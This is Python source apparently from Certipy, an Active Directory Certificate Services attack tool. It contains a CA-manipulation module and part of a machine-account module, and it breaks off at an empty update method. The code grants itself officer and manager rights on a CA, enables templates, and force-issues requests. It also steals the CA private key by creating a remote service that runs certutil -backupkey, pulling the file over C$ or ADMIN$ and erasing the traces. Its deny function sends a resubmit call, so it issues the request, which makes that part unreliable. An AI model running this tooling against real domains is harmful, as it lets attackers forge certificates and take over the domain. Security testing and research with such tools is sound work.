NAME = "ca"

import argparse
import copy
import time
from typing import List, Tuple

from impacket.dcerpc.v5 import rpcrt, rrp, scmr
from impacket.dcerpc.v5.dcom.oaut import VARIANT
from impacket.dcerpc.v5.dcomrt import DCOMANSWER, DCOMCALL, IRemUnknown
from impacket.dcerpc.v5.dtypes import DWORD, LONG, LPWSTR, PBYTE, ULONG, WSTR
from impacket.dcerpc.v5.ndr import NDRSTRUCT
from impacket.dcerpc.v5.nrpc import checkNullString
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY, DCERPCException
from impacket.ldap import ldaptypes
from impacket.smbconnection import SMBConnection
from impacket.uuid import string_to_bin, uuidtup_to_bin

from certipy.lib.certificate import NameOID, create_pfx, der_to_cert, load_pfx, x509
from certipy.lib.constants import CERTIFICATION_AUTHORITY_RIGHTS
from certipy.lib.errors import translate_error_code
from certipy.lib.kerberos import get_TGS
from certipy.lib.ldap import LDAPConnection, LDAPEntry
from certipy.lib.logger import logging
from certipy.lib.rpc import (
    get_dce_rpc,
    get_dce_rpc_from_string_binding,
    get_dcom_connection,
)
from certipy.lib.security import CASecurity
from certipy.lib.target import Target

from .template import Template

IF_NOREMOTEICERTADMINBACKUP = 0x40
CR_PROP_TEMPLATES = 0x0000001D
CLSID_ICertAdminD = string_to_bin("d99e6e73-fc88-11d0-b498-00a0c90312f3")
CLSID_CCertRequestD = string_to_bin("d99e6e74-fc88-11d0-b498-00a0c90312f3")
IID_ICertAdminD = uuidtup_to_bin(("d99e6e71-fc88-11d0-b498-00a0c90312f3", "0.0"))
IID_ICertAdminD2 = uuidtup_to_bin(("7fe0d935-dda6-443f-85d0-1cfb58fe41dd", "0.0"))
IID_ICertRequestD2 = uuidtup_to_bin(("5422fd3a-d4b8-4cef-a12e-e87d4ca22e90", "0.0"))


class DCERPCSessionError(DCERPCException):
    def __init__(self, error_string=None, error_code=None, packet=None):
        DCERPCException.__init__(self, error_string, error_code, packet)

    def __str__(self):
        self.error_code &= 0xFFFFFFFF
        error_msg = translate_error_code(self.error_code)
        return "CASessionError: %s" % error_msg


class CERTTRANSBLOB(NDRSTRUCT):
    structure = (
        ("cb", ULONG),
        ("pb", PBYTE),
    )


class ICertAdminD_ResubmitRequest(DCOMCALL):
    opnum = 5
    structure = (
        ("pwszAuthority", LPWSTR),
        ("pdwRequestId", DWORD),
        ("pwszExtensionName", LPWSTR),
    )


class ICertAdminD_ResubmitRequestResponse(DCOMANSWER):
    structure = (("pdwDisposition", ULONG),)


class ICertAdminD_DenyRequest(DCOMCALL):
    opnum = 6
    structure = (
        ("pwszAuthority", LPWSTR),
        ("pdwRequestId", DWORD),
    )


class ICertAdminD_DenyRequestResponse(DCOMANSWER):
    structure = (("ErrorCode", ULONG),)


class ICertRequestD2_GetCAProperty(DCOMCALL):
    opnum = 7
    structure = (
        ("pwszAuthority", LPWSTR),
        ("PropId", LONG),
        ("PropIndex", LONG),
        ("PropType", LONG),
    )


class ICertRequestD2_GetCAPropertyResponse(DCOMANSWER):
    structure = (("pctbPropertyValue", CERTTRANSBLOB),)


class ICertAdminD2_GetCAProperty(DCOMCALL):
    opnum = 32
    structure = (
        ("pwszAuthority", LPWSTR),
        ("PropId", LONG),
        ("PropIndex", LONG),
        ("PropType", LONG),
    )


class ICertAdminD2_GetCAPropertyResponse(DCOMANSWER):
    structure = (("pctbPropertyValue", CERTTRANSBLOB),)


class ICertAdminD2_SetCAProperty(DCOMCALL):
    opnum = 33
    structure = (
        ("pwszAuthority", LPWSTR),
        ("PropId", LONG),
        ("PropIndex", LONG),
        ("PropType", LONG),
        ("pctbPropertyValue", CERTTRANSBLOB),
    )


class ICertAdminD2_SetCAPropertyResponse(DCOMANSWER):
    structure = (("ErrorCode", ULONG),)


class ICertAdminD2_GetCASecurity(DCOMCALL):
    opnum = 36
    structure = (("pwszAuthority", LPWSTR),)


class ICertAdminD2_GetCASecurityResponse(DCOMANSWER):
    structure = (("pctbSD", CERTTRANSBLOB),)


class ICertAdminD2_SetCASecurity(DCOMCALL):
    opnum = 37
    structure = (("pwszAuthority", LPWSTR), ("pctbSD", CERTTRANSBLOB))


class ICertAdminD2_SetCASecurityResponse(DCOMANSWER):
    structure = (("ErrorCode", LONG),)


class ICertAdminD2_GetConfigEntry(DCOMCALL):
    opnum = 44
    structure = (
        ("pwszAuthority", LPWSTR),
        ("pwszNodePath", LPWSTR),
        ("pwszEntry", WSTR),
    )


class ICertAdminD2_GetConfigEntryResponse(DCOMANSWER):
    structure = (("pVariant", VARIANT),)


class ICertCustom(IRemUnknown):
    def request(self, req, *args, **kwargs):
        req["ORPCthis"] = self.get_cinstance().get_ORPCthis()
        req["ORPCthis"]["flags"] = 0
        self.connect(self._iid)
        dce = self.get_dce_rpc()
        try:
            resp = dce.request(req, self.get_iPid(), *args, **kwargs)
        except Exception as e:
            if str(e).find("RPC_E_DISCONNECTED") >= 0:
                msg = str(e) + "\n"
                msg += (
                    "DCOM keep-alive pinging it might not be working as expected. You "
                    "can't be idle for more than 14 minutes!\n"
                )
                msg += "You should exit the app and start again\n"
                raise DCERPCException(msg)
            else:
                raise
        return resp


class ICertAdminD(ICertCustom):
    def __init__(self, interface):
        super().__init__(interface)
        self._iid = IID_ICertAdminD


class ICertAdminD2(ICertCustom):
    def __init__(self, interface):
        super().__init__(interface)
        self._iid = IID_ICertAdminD2


class ICertRequestD2(ICertCustom):
    def __init__(self, interface):
        super().__init__(interface)
        self._iid = IID_ICertRequestD2


class CA:
    def __init__(
        self,
        target: Target,
        ca: str = None,
        template: str = None,
        officer: str = None,
        request_id: int = 0,
        connection: LDAPConnection = None,
        scheme: str = "ldaps",
        dc_host: str = None,
        dynamic: bool = False,
        config: str = None,
        timeout: int = 5,
        debug: bool = False,
        **kwargs
    ):
        self.target = target
        self.request_id = request_id
        self.ca = ca
        self.officer = officer
        self.template = template
        self.scheme = scheme
        self.dc_host = dc_host
        self.dynamic = dynamic
        self.config = config
        self.timeout = timeout
        self.verbose = debug
        self.kwargs = kwargs

        self._connection: LDAPConnection = connection
        self._cert_admin: ICertAdminD = None
        self._cert_admin2: ICertAdminD2 = None
        self._cert_request2: ICertRequestD2 = None
        self._rrp_dce = None

    @property
    def connection(self):
        if self._connection:
            return self._connection

        target = copy.copy(self.target)

        if target.do_kerberos or target.use_sspi:
            if self.dc_host is None:
                raise Exception(
                    "Kerberos auth requires DNS name of the target DC. Use -dc-host."
                )

            target.remote_name = self.dc_host

            if target.dc_ip is None:
                target.dc_ip = target.resolver.resolve(self.dc_host)

        if target.dc_ip:
            target.target_ip = target.dc_ip
        else:
            if self.dc_host:
                remote_name = self.dc_host
            else:
                remote_name = target.domain

            if "." not in remote_name:
                logging.warning(
                    "%s doesn't look like a FQDN. DNS resolution will probably fail."
                    % repr(remote_name)
                )

            target.target_ip = target.resolver.resolve(remote_name)

        self._connection = LDAPConnection(target, self.scheme)
        self._connection.connect()

        return self._connection

    @property
    def cert_admin(self) -> ICertAdminD:
        if self._cert_admin is not None:
            return self._cert_admin

        dcom = get_dcom_connection(self.target)
        iInterface = dcom.CoCreateInstanceEx(CLSID_ICertAdminD, IID_ICertAdminD)
        iInterface.get_cinstance().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
        self._cert_admin = ICertAdminD(iInterface)
        return self._cert_admin

    @property
    def cert_admin2(self) -> ICertAdminD2:
        if self._cert_admin2 is not None:
            return self._cert_admin2

        dcom = get_dcom_connection(self.target)
        iInterface = dcom.CoCreateInstanceEx(CLSID_ICertAdminD, IID_ICertAdminD2)
        iInterface.get_cinstance().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
        self._cert_admin2 = ICertAdminD2(iInterface)

        return self._cert_admin2

    @property
    def cert_request2(self) -> ICertRequestD2:
        if self._cert_request2 is not None:
            return self._cert_request2

        dcom = get_dcom_connection(self.target)
        iInterface = dcom.CoCreateInstanceEx(CLSID_CCertRequestD, IID_ICertRequestD2)
        iInterface.get_cinstance().set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
        self._cert_request2 = ICertRequestD2(iInterface)

        return self._cert_request2

    @property
    def rrp_dce(self):
        if self._rrp_dce is not None:
            return self._rrp_dce

        dce = get_dce_rpc_from_string_binding(
            "ncacn_np:445[\\pipe\\winreg]", self.target, timeout=self.target.timeout
        )

        for _ in range(3):
            try:
                dce.connect()
                dce.bind(rrp.MSRPC_UUID_RRP)
                logging.debug(
                    "Connected to remote registry at %s (%s)"
                    % (repr(self.target.remote_name), self.target.target_ip)
                )
                break
            except Exception as e:
                if "STATUS_PIPE_NOT_AVAILABLE" in str(e):
                    logging.warning(
                        (
                            "Failed to connect to remote registry. Service should be "
                            "starting now. Trying again..."
                        )
                    )
                    time.sleep(1)
                else:
                    raise e
        else:
            logging.warning("Failed to connect to remote registry")
            return None

        self._rrp_dce = dce

        return self._rrp_dce

    def get_exchange_certificate(self) -> x509.Certificate:
        request = ICertRequestD2_GetCAProperty()
        request["pwszAuthority"] = checkNullString(self.ca)
        request["PropId"] = 0x0000000F
        request["PropIndex"] = 0
        request["PropType"] = 0x00000003

        resp = self.cert_request2.request(request)

        exchange_cert = der_to_cert(b"".join(resp["pctbPropertyValue"]["pb"]))

        return exchange_cert

    def get_config_csra(self) -> Tuple[int, int, int, CASecurity]:
        request = ICertAdminD2_GetConfigEntry()
        request["pwszAuthority"] = checkNullString(self.ca)
        request["pwszNodePath"] = checkNullString(
            "PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy"
        )
        request["pwszEntry"] = checkNullString("RequestDisposition")

        resp = self.cert_admin2.request(request)

        request_disposition = resp["pVariant"]["_varUnion"]["lVal"]

        request["pwszEntry"] = checkNullString("EditFlags")

        resp = self.cert_admin2.request(request)

        edit_flags = resp["pVariant"]["_varUnion"]["lVal"]

        request["pwszNodePath"] = checkNullString("")
        request["pwszEntry"] = checkNullString("InterfaceFlags")

        resp = self.cert_admin2.request(request)

        interface_flags = resp["pVariant"]["_varUnion"]["lVal"]

        request = ICertAdminD2_GetCASecurity()
        request["pwszAuthority"] = checkNullString(self.ca)

        resp = self.cert_admin2.request(request)

        security = CASecurity(b"".join(resp["pctbSD"]["pb"]))

        return (edit_flags, request_disposition, interface_flags, security)

    def get_config_rrp(self) -> Tuple[int, int, int, CASecurity]:
        hklm = rrp.hOpenLocalMachine(self.rrp_dce)

        h_root_key = hklm["phKey"]

        policy_key = rrp.hBaseRegOpenKey(
            self.rrp_dce,
            h_root_key,
            (
                "SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\%s\\"
                "PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy"
            )
            % self.ca,
        )

        _, edit_flags = rrp.hBaseRegQueryValue(
            self.rrp_dce, policy_key["phkResult"], "EditFlags"
        )

        _, request_disposition = rrp.hBaseRegQueryValue(
            self.rrp_dce, policy_key["phkResult"], "RequestDisposition"
        )

        configuration_key = rrp.hBaseRegOpenKey(
            self.rrp_dce,
            h_root_key,
            "SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\%s" % self.ca,
        )

        _, interface_flags = rrp.hBaseRegQueryValue(
            self.rrp_dce, configuration_key["phkResult"], "InterfaceFlags"
        )

        _, security_descriptor = rrp.hBaseRegQueryValue(
            self.rrp_dce, configuration_key["phkResult"], "Security"
        )

        security_descriptor = CASecurity(security_descriptor)

        return (edit_flags, request_disposition, interface_flags, security_descriptor)

    def get_config(self) -> Tuple[int, int, int, CASecurity]:
        try:
            logging.info(
                "Trying to get CA configuration for %s via CSRA" % repr(self.ca)
            )
            result = self.get_config_csra()
            logging.info("Got CA configuration for %s" % repr(self.ca))
            return result
        except Exception as e:
            logging.warning(
                "Got error while trying to get CA configuration for %s via CSRA: %s"
                % (repr(self.ca), str(e))
            )

        try:
            logging.info(
                "Trying to get CA configuration for %s via RRP" % repr(self.ca)
            )
            result = self.get_config_rrp()
            logging.info("Got CA configuration for %s" % repr(self.ca))
            return result
        except Exception as e:
            logging.warning(
                "Got error while trying to get CA configuration for %s via RRP: %s"
                % (repr(self.ca), str(e))
            )

        logging.warning("Failed to get CA configuration for %s" % repr(self.ca))

        return (None, None, None, None)

    def issue(self) -> bool:
        if self.request_id is None:
            logging.error(
                (
                    "A request ID (-request-id) is required in order to issue a pending"
                    " or failed certificate request"
                )
            )
            return False

        request = ICertAdminD_ResubmitRequest()
        request["pwszAuthority"] = checkNullString(self.ca)
        request["pdwRequestId"] = int(self.request_id)

        try:
            resp = self.cert_admin.request(request)
        except DCERPCSessionError as e:
            if "E_ACCESSDENIED" in str(e):
                logging.error("Got access denied trying to issue certificate")
                return False
            raise e

        error_code = resp["pdwDisposition"]

        if error_code == 3:
            logging.info("Successfully issued certificate")
        else:
            error_msg = translate_error_code(error_code)
            logging.error(
                "Got error while trying to issue certificate: %s" % (error_msg)
            )
            return False

        return True

    def deny(self) -> bool:
        if self.request_id is None:
            logging.error(
                (
                    "A request ID (-request-id) is required in order to deny a pending "
                    "certificate request"
                )
            )
            return False

        request = ICertAdminD_ResubmitRequest()
        request["pwszAuthority"] = checkNullString(self.ca)
        request["pdwRequestId"] = int(self.request_id)

        try:
            resp = self.cert_admin.request(request)
        except DCERPCSessionError as e:
            if "E_ACCESSDENIED" in str(e):
                logging.error(
                    "Got access denied while trying to deny certificate request"
                )
                return False
            raise

        error_code = resp["pdwDisposition"]

        if error_code == 3:
            logging.info("Successfully denied certificate request")
        else:
            error_msg = translate_error_code(error_code)
            logging.error(
                "Got error while trying to deny certificate request: %s" % (error_msg)
            )
            return False

        return True

    def get_templates(self) -> str:
        if self.ca is None:
            logging.error("A CA (-ca) is required")
            return False

        request = ICertAdminD2_GetCAProperty()
        request["pwszAuthority"] = checkNullString(self.ca)
        request["PropId"] = CR_PROP_TEMPLATES
        request["PropIndex"] = 0
        request["PropType"] = 4

        try:
            resp = self.cert_admin2.request(request)
        except DCERPCSessionError as e:
            if "E_ACCESSDENIED" in str(e):
                logging.error("Got access denied while trying to get templates")
                return None
            raise e

        certificate_templates = (
            b"".join(resp["pctbPropertyValue"]["pb"]).decode("utf-16le").split("\n")
        )

        return certificate_templates

    def list_templates(self):
        certificate_templates = self.get_templates()

        if certificate_templates is None:
            return

        if len(certificate_templates) == 1:
            logging.info(
                "There are no enabled certificate templates on %s" % repr(self.ca)
            )
            return

        logging.info("Enabled certificate templates on %s:" % repr(self.ca))
        for i in range(0, len(certificate_templates) - 1, 2):
            print("    %s" % certificate_templates[i])

    def enable(self, disable: bool = False) -> bool:
        if self.ca is None:
            logging.error("A CA (-ca) is required")
            return False

        if self.template is None:
            logging.error("A template (-template) is required")
            return False

        certificate_templates = self.get_templates()

        template = Template(self.target, connection=self.connection)
        template = template.get_configuration(self.template)
        if template is None:
            return False

        action = "enabl"
        if disable:
            action = "disabl"
            if template.get("cn") not in certificate_templates:
                logging.error(
                    "Certificate template %s is not enabled on %s"
                    % (repr(template.get("cn")), repr(self.ca))
                )
                return False

            certificate_templates = (
                certificate_templates[: certificate_templates.index(template.get("cn"))]
                + certificate_templates[
                    certificate_templates.index(template.get("cn")) + 2 :
                ]
            )
        else:
            certificate_templates = [
                template.get("cn"),
                template.get("msPKI-Cert-Template-OID"),
            ] + certificate_templates

        certificate_templates = [
            bytes([c]) for c in "\n".join(certificate_templates).encode("utf-16le")
        ]

        request = ICertAdminD2_SetCAProperty()
        request["pwszAuthority"] = checkNullString(self.ca)
        request["PropId"] = CR_PROP_TEMPLATES
        request["PropIndex"] = 0
        request["PropType"] = 4
        request["pctbPropertyValue"]["cb"] = len(certificate_templates)
        request["pctbPropertyValue"]["pb"] = certificate_templates

        try:
            resp = self.cert_admin2.request(request)
        except DCERPCSessionError as e:
            if "E_ACCESSDENIED" in str(e):
                logging.error(
                    "Got access denied while trying to %se certificate" % action
                )
                return False
            raise e

        error_code = resp["ErrorCode"]
        if error_code == 0:
            logging.info(
                "Successfully %sed %s on %s"
                % (action, repr(template.get("cn")), repr(self.ca))
            )
        else:
            error_msg = translate_error_code(error_code)
            logging.error(
                "Got error while trying to %se certificate template: %s"
                % (action, error_msg)
            )
            return False

        return True

    def disable(self):
        return self.enable(disable=True)

    def add(self, user, right, right_type):
        connection = self.connection

        user = connection.get_user(user)
        if user is None:
            return False

        sid = ldaptypes.LDAP_SID(data=user.get_raw("objectSid")[0])

        request = ICertAdminD2_GetCASecurity()
        request["pwszAuthority"] = checkNullString(self.ca)

        try:
            resp = self.cert_admin2.request(request)
        except DCERPCSessionError as e:
            if "E_ACCESSDENIED" in str(e):
                logging.error("Got access denied while trying to get CA security")
                return False
            raise e

        sd = ldaptypes.SR_SECURITY_DESCRIPTOR()
        sd.fromString(b"".join(resp["pctbSD"]["pb"]))

        for i in range(len(sd["Dacl"]["Data"])):
            ace = sd["Dacl"]["Data"][i]
            if ace["AceType"] != ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE:
                continue

            if ace["Ace"]["Sid"].getData() != sid.getData():
                continue

            if ace["Ace"]["Mask"]["Mask"] & right != 0:
                logging.info(
                    "User %s already has %s rights on %s"
                    % (repr(user.get("sAMAccountName")), right_type, repr(self.ca))
                )
                return True

            ace["Ace"]["Mask"]["Mask"] |= right

            break
        else:
            ace = ldaptypes.ACE()
            ace["AceType"] = ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE
            ace["AceFlags"] = 0
            ace["Ace"] = ldaptypes.ACCESS_ALLOWED_ACE()
            ace["Ace"]["Mask"] = ldaptypes.ACCESS_MASK()
            ace["Ace"]["Mask"]["Mask"] = right
            ace["Ace"]["Sid"] = sid

            sd["Dacl"]["Data"].append(ace)

        sd = [bytes([c]) for c in sd.getData()]

        request = ICertAdminD2_SetCASecurity()
        request["pwszAuthority"] = checkNullString(self.ca)
        request["pctbSD"]["cb"] = len(sd)
        request["pctbSD"]["pb"] = sd

        try:
            resp = self.cert_admin2.request(request)
        except DCERPCSessionError as e:
            if "E_ACCESSDENIED" in str(e):
                logging.error("Got access denied while trying to add %s" % right_type)
                return False
            print(e)
            raise e

        error_code = resp["ErrorCode"]
        if error_code == 0:
            logging.info(
                "Successfully added %s %s on %s"
                % (right_type, repr(user.get("sAMAccountName")), repr(self.ca))
            )
        else:
            error_msg = translate_error_code(error_code)
            logging.error(
                "Got error while trying to add %s: %s" % (right_type, error_msg)
            )
            return False

    def remove(self, user, right, right_type):
        connection = self.connection

        user = connection.get_user(user)
        if user is None:
            return False

        sid = ldaptypes.LDAP_SID(data=user.get_raw("objectSid")[0])

        request = ICertAdminD2_GetCASecurity()
        request["pwszAuthority"] = checkNullString(self.ca)

        try:
            resp = self.cert_admin2.request(request)
        except DCERPCSessionError as e:
            if "E_ACCESSDENIED" in str(e):
                logging.error("Got access denied while trying to get CA security")
                return False
            raise e

        sd = ldaptypes.SR_SECURITY_DESCRIPTOR()
        sd.fromString(b"".join(resp["pctbSD"]["pb"]))

        for i in range(len(sd["Dacl"]["Data"])):
            ace = sd["Dacl"]["Data"][i]
            if ace["AceType"] != ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE:
                continue

            if ace["Ace"]["Sid"].getData() != sid.getData():
                continue

            if ace["Ace"]["Mask"]["Mask"] & right == 0:
                logging.info(
                    "User %s does not have %s rights on %s"
                    % (repr(user.get("sAMAccountName")), right_type, repr(self.ca))
                )
                return True

            ace["Ace"]["Mask"]["Mask"] ^= right

            if ace["Ace"]["Mask"]["Mask"] == 0:
                sd["Dacl"]["Data"].pop(i)
            break
        else:
            logging.info(
                "User %s does not have %s rights on %s"
                % (repr(user.get("sAMAccountName")), right_type, repr(self.ca))
            )
            return True

        sd = [bytes([c]) for c in sd.getData()]

        request = ICertAdminD2_SetCASecurity()
        request["pwszAuthority"] = checkNullString(self.ca)
        request["pctbSD"]["cb"] = len(sd)
        request["pctbSD"]["pb"] = sd

        try:
            resp = self.cert_admin2.request(request)
        except DCERPCSessionError as e:
            if "E_ACCESSDENIED" in str(e):
                logging.error(
                    "Got access denied while trying to remove %s" % right_type
                )
                return False
            raise e

        error_code = resp["ErrorCode"]
        if error_code == 0:
            logging.info(
                "Successfully removed %s %s on %s"
                % (right_type, repr(user.get("sAMAccountName")), repr(self.ca))
            )
        else:
            error_msg = translate_error_code(error_code)
            logging.error(
                "Got error while trying to remove %s: %s" % (right_type, error_msg)
            )
            return False

    def add_officer(self, officer: str) -> bool:
        return self.add(
            officer, CERTIFICATION_AUTHORITY_RIGHTS.MANAGE_CERTIFICATES.value, "officer"
        )

    def remove_officer(self, officer: str) -> bool:
        return self.remove(
            officer, CERTIFICATION_AUTHORITY_RIGHTS.MANAGE_CERTIFICATES.value, "officer"
        )

    def add_manager(self, manager: str) -> bool:
        return self.add(
            manager, CERTIFICATION_AUTHORITY_RIGHTS.MANAGE_CA.value, "manager"
        )

    def remove_manager(self, manager: str) -> bool:
        return self.remove(
            manager, CERTIFICATION_AUTHORITY_RIGHTS.MANAGE_CA.value, "manager"
        )

    def get_enrollment_services(self) -> List["LDAPEntry"]:
        enrollment_services = self.connection.search(
            "(&(objectClass=pKIEnrollmentService))",
            search_base="CN=Enrollment Services,CN=Public Key Services,CN=Services,%s"
            % self.connection.configuration_path,
        )

        return enrollment_services

    def get_enrollment_service(self, ca: str) -> LDAPEntry:
        enrollment_services = self.connection.search(
            "(&(cn=%s)(objectClass=pKIEnrollmentService))" % ca,
            search_base="CN=Enrollment Services,CN=Public Key Services,CN=Services,%s"
            % self.connection.configuration_path,
        )

        if len(enrollment_services) == 0:
            logging.warning(
                "Could not find any enrollment service identified by %s" % repr(ca)
            )
            return None

        return enrollment_services[0]

    def get_backup(self) -> bytes:
        smbclient = SMBConnection(
            self.target.remote_name, self.target.target_ip, timeout=self.target.timeout
        )
        if self.target.do_kerberos:
            tgs, cipher, session_key, username, domain = get_TGS(
                self.target, self.target.remote_name, "cifs"
            )

            TGS = {}
            TGS["KDC_REP"] = tgs
            TGS["cipher"] = cipher
            TGS["sessionKey"] = session_key

            smbclient.kerberosLogin(
                username,
                self.target.password,
                domain,
                self.target.lmhash,
                self.target.nthash,
                kdcHost=self.target.dc_ip,
                TGS=TGS,
            )
        else:
            smbclient.login(
                self.target.username,
                self.target.password,
                self.target.domain,
                self.target.lmhash,
                self.target.nthash,
            )

        try:
            share = "C$"
            tid = smbclient.connectTree(share)
            file_path = "\\Windows\\Tasks\\certipy.pfx"
        except Exception as e:
            if "STATUS_BAD_NETWORK_NAME" in str(e):
                tid = None
            else:
                raise e

        if tid is None:
            try:
                share = "ADMIN$"
                tid = smbclient.connectTree(share)
                file_path = "\\Tasks\\certipy.pfx"
            except Exception as e:
                if "STATUS_BAD_NETWORK_NAME" in str(e):
                    raise Exception(
                        "Could not connect to 'C$' or 'ADMIN$' on %s"
                        % repr(self.target.target_ip)
                    )
                    return False
                else:
                    raise e

        pfx = None

        def _read_pfx(data: bytes):
            nonlocal pfx
            logging.info("Got certificate and private key")
            pfx = data

        try:
            smbclient.getFile(share, file_path, _read_pfx)
        except Exception as e:
            if "STATUS_OBJECT_NAME_NOT_FOUND" in str(e):
                logging.error(
                    "Could not find the certificate and private key. This most likely means that the backup failed"
                )

        smbclient.deleteFile(share, file_path)

        return pfx

    def backup(self):
        dce = get_dce_rpc(
            scmr.MSRPC_UUID_SCMR,
            r"\pipe\svcctl",
            self.target,
            timeout=self.timeout,
            dynamic=self.dynamic,
            verbose=self.verbose,
            auth_level_np=rpcrt.RPC_C_AUTHN_LEVEL_NONE,
        )

        if dce is None:
            logging.error(
                "Failed to connect to Service Control Manager Remote Protocol"
            )
            return False

        res = scmr.hROpenSCManagerW(dce)
        handle = res["lpScHandle"]

        config = " -config %s" % self.config if self.config else ""

        cmd = (
            r"cmd.exe /c certutil %s -backupkey -f -p certipy C:\Windows\Tasks\Certipy && move /y C:\Windows\Tasks\Certipy\* C:\Windows\Tasks\certipy.pfx"
            % config
        )

        logging.info("Creating new service")
        try:
            resp = scmr.hRCreateServiceW(
                dce,
                handle,
                "Certipy",
                "Certipy",
                lpBinaryPathName=cmd,
                dwStartType=scmr.SERVICE_DEMAND_START,
            )

            service_handle = resp["lpServiceHandle"]
        except Exception as e:
            if "ERROR_SERVICE_EXISTS" in str(e):
                resp = scmr.hROpenServiceW(dce, handle, "Certipy")

                service_handle = resp["lpServiceHandle"]

                resp = scmr.hRChangeServiceConfigW(
                    dce,
                    service_handle,
                    lpBinaryPathName=cmd,
                )
            else:
                raise e

        logging.info("Creating backup")
        try:
            scmr.hRStartServiceW(dce, service_handle)
        except Exception as e:
            pass

        logging.info("Retrieving backup")
        try:
            pfx = self.get_backup()
            with open("pfx.p12", "wb") as f:
                f.write(pfx)

            key, cert = load_pfx(pfx, b"certipy")
            common_name = cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)[0]

            pfx = create_pfx(key, cert)

            pfx_out = "%s.pfx" % common_name.value

            with open(pfx_out, "wb") as f:
                f.write(pfx)
            logging.info("Saved certificate and private key to %s" % repr(pfx_out))
        except Exception as e:
            logging.error("Backup failed: %s" % e)

        logging.info("Cleaning up")

        cmd = r"cmd.exe /c del /f /q C:\Windows\Tasks\Certipy\* && rmdir C:\Windows\Tasks\Certipy"

        resp = scmr.hRChangeServiceConfigW(
            dce,
            service_handle,
            lpBinaryPathName=cmd,
        )

        try:
            scmr.hRStartServiceW(dce, service_handle)
        except Exception as e:
            pass

        scmr.hRDeleteService(dce, service_handle)
        scmr.hRCloseServiceHandle(dce, service_handle)


def entry(options: argparse.Namespace) -> None:
    target = Target.from_options(options)
    del options.target

    ca = CA(target, **vars(options))

    if not options.backup:
        if not options.ca:
            logging.error("A CA (-ca) is required")
            return

    if options.backup is True:
        ca.backup()
    elif options.add_officer is not None:
        ca.add_officer(options.add_officer)
    elif options.remove_officer is not None:
        ca.remove_officer(options.remove_officer)
    elif options.add_manager is not None:
        ca.add_manager(options.add_manager)
    elif options.remove_manager is not None:
        ca.remove_manager(options.remove_manager)
    elif options.list_templates:
        ca.list_templates()
    elif options.issue_request is not None:
        ca.request_id = int(options.issue_request)
        ca.issue()
    elif options.deny_request is not None:
        ca.request_id = int(options.deny_request)
        ca.deny()
    elif options.enable_template is not None:
        ca.template = options.enable_template
        ca.enable()
    elif options.disable_template is not None:
        ca.template = options.disable_template
        ca.disable()
    else:
        logging.error("No action specified")



import argparse
import random
import string

import ldap3

from certipy.lib.formatting import pretty_print
from certipy.lib.ldap import LDAPConnection
from certipy.lib.logger import logging
from certipy.lib.target import Target


class Account:
    def __init__(
        self,
        target: Target,
        user: str,
        dns: str = None,
        upn: str = None,
        sam: str = None,
        spns: str = None,
        passw: str = None,
        group: str = None,
        scheme: str = "ldaps",
        connection: LDAPConnection = None,
        timeout: int = 5,
        debug: bool = False,
        **kwargs
    ):
        self.target = target
        self.user = user
        self.dns = dns
        self.upn = upn
        self.sam = sam
        self.spns = spns
        self.password = passw
        self.group = group
        self.scheme = scheme
        self._connection = connection
        self.timeout = timeout
        self.verbose = debug
        self.kwargs = kwargs

    @property
    def connection(self) -> LDAPConnection:
        if self._connection is not None:
            return self._connection

        self._connection = LDAPConnection(self.target, self.scheme)
        self._connection.connect()

        return self._connection

    def create(self):
        username = self.user
        if self.sam is not None:
            logging.warning(
                "The parameter -sam overrides the -user parameter for the create operation"
            )
            res = input("Do you want to continue? (Y/n) ").rstrip("\n")
            if res.lower() == "n":
                return False

            username = self.sam

        user = self.connection.get_user(username, silent=True)
        if user is not None:
            logging.error(
                "User %s already exists. If you want to update the user, specify the 'update' action"
                % repr(user.get("sAMAccountName"))
            )
            return False

        group = self.group
        if group is None:
            group = "CN=Computers," + self.connection.default_path

        if username[-1] != "$":
            username += "$"

        password = self.password
        if password is None:
            password = "".join(
                random.choice(string.ascii_letters + string.digits) for _ in range(16)
            )
            self.password = password

        dns = self.dns
        if dns is None:
            dns = (username.rstrip("$") + "." + self.connection.domain).lower()

        hostname = username[:-1]
        dn = "CN=%s,%s" % (hostname, group)

        spns = self.spns
        if spns is None:
            spns = [
                "HOST/%s" % username.rstrip("$"),
                "RestrictedKrbHost/%s" % username.rstrip("$"),
            ]
        else:
            spns = list(
                filter(
                    lambda x: len(x) > 0, map(lambda x: x.strip(), self.spns.split(","))
                )
            )

        attributes = {
            "sAMAccountName": username,
            "unicodePwd": password,  # just for the pretty print
            "userAccountControl": 0x1000,
            "servicePrincipalName": spns,
            "dnsHostName": dns,
        }

        logging.info("Creating new account:")
        pretty_print(attributes, indent=2)

        attributes["unicodePwd"] = ('"%s"' % password).encode("utf-16-le")

        result = self.connection.add(
            dn,
            ["top", "person", "organizationalPerson", "user", "computer"],
            attributes,
        )

        if result["result"] == 0:
            logging.info(
                "Successfully created account %s with password %s"
                % (repr(username), repr(password))
            )
            return True
        elif result["result"] == ldap3.core.results.RESULT_INSUFFICIENT_ACCESS_RIGHTS:
            logging.error(
                "User %s doesn't have the right to create a machine account"
                % repr(self.target.username)
            )
        elif (
            result["result"] == ldap3.core.results.RESULT_UNWILLING_TO_PERFORM
            and int(result["message"].split(":")[0].strip(), 16) == 0x216D
        ):
            logging.error(
                "Machine account quota exceeded for %s" % repr(self.target.username)
            )
        else:
            logging.error(
                "Received unknown error: (%s) %s"
                % (result["description"], result["message"])
            )

        return False

    def read(self):
        user = self.connection.get_user(self.user)
        if user is None:
            return False

        attribute_values = {}
        attributes = [
            "cn",
            "distinguishedName",
            "name",
            "objectSid",
            "sAMAccountName",
            "dNSHostName",
            "servicePrincipalName",
        ]

        logging.info("Reading attributes for %s:" % repr(user.get("sAMAccountName")))
        for attribute in attributes:
            value = user.get(attribute)
            if value is not None:
                attribute_values[attribute] = value
        pretty_print(attribute_values, indent=2)

    def update(self):
